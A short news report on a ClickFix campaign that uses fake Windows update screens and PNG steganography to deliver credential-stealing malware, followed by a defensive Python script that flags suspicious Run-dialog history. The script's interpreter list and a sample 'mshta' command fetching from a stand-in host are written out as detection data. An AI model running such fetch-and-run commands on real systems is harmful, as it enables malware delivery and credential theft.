Security researchers have identified a new ClickFix attack targeting Windows users with fake security updates. Attackers are deploying realistic Windows Security Update screens to trick users into executing harmful commands.
Recent Campaign Details
The ClickFix method, a form of social engineering, has become a prevalent technique for tricking users into running damaging commands on their own devices. A report from Huntress on 2025-11-24 highlights the latest ClickFix campaigns delivering credential-stealing malware.
Analysts Ben Folland and Anna Pham from Huntress observed the campaigns using steganography to hide malicious code within PNG images. The payload is carried in the images' color channels and decoded in memory, adding complexity and stealth to the attack.
Safety Recommendations
All Windows users should be cautious and verify update prompts through official Microsoft channels. A legitimate Windows update will never ask users to enter commands into the Windows Run prompt. Any such prompts should be disregarded and treated as potential threats.
The increase in these attacks underscores the need for vigilance as both state-sponsored and criminal groups exploit this method for initial access to systems.
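For defenders checking whether a user followed such a prompt, the following is an added triage example, not code from Huntress or from the original article. Windows records commands entered in the Run dialog under the per-user registry key HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The function names, the interpreter list, the length threshold and the sample entries are assumptions constructed for illustration.

```python
import re

# Programs that run scripts or fetch content; rarely typed into Run with arguments.
INTERPRETERS = {"powershell", "pwsh", "mshta", "cmd", "wscript", "cscript",
                "curl", "msiexec", "rundll32", "regsvr32", "certutil"}
URL_RE = re.compile(r"https?://", re.IGNORECASE)
MAX_TYPED_LEN = 80  # assumption: hand-typed Run entries are short

def normalize(data):
    """Drop the trailing '\\1' marker that RunMRU appends to each command."""
    return data[:-2] if data.endswith("\\1") else data

def program_name(command):
    """Lower-cased base name of the first token, without a .exe suffix."""
    tokens = command.split()
    if not tokens:
        return ""
    base = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return base[:-4] if base.endswith(".exe") else base

def triage_runmru(entries):
    """Return [(value_name, command, reasons)] for entries worth reviewing."""
    findings = []
    for name, data in entries.items():
        if name.lower() == "mrulist":  # ordering string, not a command
            continue
        command = normalize(data)
        reasons = []
        if program_name(command) in INTERPRETERS:
            reasons.append("interpreter")
        if URL_RE.search(command):
            reasons.append("url")
        if len(command) > MAX_TYPED_LEN:
            reasons.append("long")
        # An interpreter alone ("cmd") is routine; require a second signal.
        if "interpreter" in reasons and len(reasons) > 1:
            findings.append((name, command, reasons))
    return findings

# Constructed sample shaped like the RunMRU key's values.
SAMPLE = {
    "MRUList": "dcba", "a": "cmd\\1", "b": "notepad\\1",
    "c": "\\\\fileserver\\share\\1",
    "d": "mshta https://update-check.example.invalid/verify\\1",
}

if __name__ == "__main__":
    print(triage_runmru(SAMPLE))
```

A hit is a lead for review rather than proof of compromise; confirm it against process-creation and network telemetry from the same time window.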



